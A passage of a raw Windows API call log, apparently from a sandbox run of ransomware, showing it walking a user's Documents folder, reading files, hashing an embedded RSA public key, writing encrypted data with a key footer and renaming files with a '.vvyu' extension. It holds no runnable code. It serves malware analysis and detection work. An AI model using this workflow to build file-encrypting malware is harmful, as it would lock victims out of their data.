RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db98 [0189.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0189.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbf8 | out: hHeap=0x2c0000) returned 1 [0189.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0189.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc28 | out: hHeap=0x2c0000) returned 1 [0189.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0189.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0189.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0189.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db98 | out: hHeap=0x2c0000) returned 1 [0189.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0189.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0189.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0189.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0189.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0189.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0189.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0189.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0189.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0189.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0189.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbc8 | out: hHeap=0x2c0000) returned 1 [0189.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc10 | out: hHeap=0x2c0000) returned 1 [0189.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbb0 | out: hHeap=0x2c0000) returned 1 [0189.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db80 | out: hHeap=0x2c0000) returned 1 [0189.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0189.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0189.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0189.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db68 | out: hHeap=0x2c0000) returned 1 [0189.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2de8 | out: hHeap=0x2c0000) returned 1 [0189.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0189.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0189.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0189.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0189.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0189.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0189.621] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x15e78, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x15e78, lpOverlapped=0x0) returned 1 [0189.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0189.622] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15e7d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.622] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0189.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0189.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0189.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0189.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.623] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0189.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0189.624] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.624] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0189.624] CloseHandle (hObject=0x584) returned 1 [0189.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af1f88 [0189.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.626] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\wXPNYv.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\wxpnyv.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\wXPNYv.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\wxpnyv.xlsx.vvyu")) returned 1 [0189.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.628] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.631] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe44e2210, ftCreationTime.dwHighDateTime=0x1d8a124, ftLastAccessTime.dwLowDateTime=0x49174cd0, ftLastAccessTime.dwHighDateTime=0x1d8a4d6, ftLastWriteTime.dwLowDateTime=0x49174cd0, ftLastWriteTime.dwHighDateTime=0x1d8a4d6, nFileSizeHigh=0x0, nFileSizeLow=0x13d0d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xR3NLEX5cZvfg.pptx", cAlternateFileName="XR3NLE~1.PPT")) returned 1 [0189.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2de8 [0189.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2de8 | out: hHeap=0x2c0000) returned 1 [0189.631] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\xR3NLEX5cZvfg.pptx") returned=".pptx" [0189.631] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\xR3NLEX5cZvfg.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\xr3nlex5czvfg.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.632] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=81165) returned 1 [0189.632] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0189.635] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x13ce7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.635] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0189.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.637] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.637] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x13d0d, lpOverlapped=0x0) returned 1 [0189.638] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0189.638] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.638] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.638] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0189.639] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0189.639] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.639] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0189.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0189.639] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0189.639] GetLastError () returned 0x0 [0189.639] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0189.639] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0189.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.640] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0189.640] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0189.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.640] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0189.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x13d10) returned 0x2af5168 [0189.640] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0189.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0189.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0189.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2de8 [0189.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db68 [0189.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db80 [0189.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbb0 [0189.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc10 [0189.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbc8 [0189.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0189.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0189.641] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0189.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0189.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbb0 | out: hHeap=0x2c0000) returned 1 [0189.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbc8 | out: hHeap=0x2c0000) returned 1 [0189.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc10 | out: hHeap=0x2c0000) returned 1 [0189.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0189.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc10 [0189.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0189.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbc8 [0189.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0189.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0dbb0 [0189.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0189.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0189.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0189.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0189.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0189.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0189.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbc8 | out: hHeap=0x2c0000) returned 1 [0189.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dbb0 | out: hHeap=0x2c0000) returned 1 [0189.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc10 | out: hHeap=0x2c0000) returned 1 [0189.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0189.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0189.644] GetCurrentThreadId () returned 0x5d8 [0189.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0189.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae47b8 [0189.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0189.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0189.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0189.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0189.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.645] GetCurrentThreadId () returned 0x5d8 [0189.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0189.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0189.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0189.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0189.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc10 [0189.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0189.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0189.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0189.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbb0 [0189.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0189.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0189.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0189.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0189.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dbc8 [0189.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0189.648] RtlAllocateHeap (HeapHandle=0x2c0000, 